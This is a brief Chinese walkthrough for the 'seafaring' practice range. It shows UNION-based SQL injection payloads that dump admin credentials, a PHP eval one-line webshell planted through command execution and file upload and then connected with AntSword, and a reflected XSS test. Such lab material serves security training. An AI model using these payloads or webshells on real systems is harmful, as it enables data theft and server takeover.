seafaring靶场漏洞测试攻略

步骤一：打开网页

一：sql注入漏洞

步骤一：测试回显点

-1 union select 1,2,3#

步骤二：查看数据库

-1 union select 1,2,database()#

步骤三：查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

步骤四：查看列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

步骤五：查看账户密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

二：命令执行漏洞

步骤一：页面下方有一个执行框，输入ls查看

步骤二：写入一句话木马，访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

步骤三：用蚁剑连接

三：文件上传漏洞

步骤一：使用 账号为admin，密码为mysql 登录网站后台，下方有一个上传文件的地方

步骤二：尝试写入一句话木马到2.php中上传

上传成功进行访问

进行蚁剑连接

四：反射型xss漏洞

步骤一：登陆界面输入错误会回显在页面上

步骤二：输入<script>alert(1)</script>,页面弹1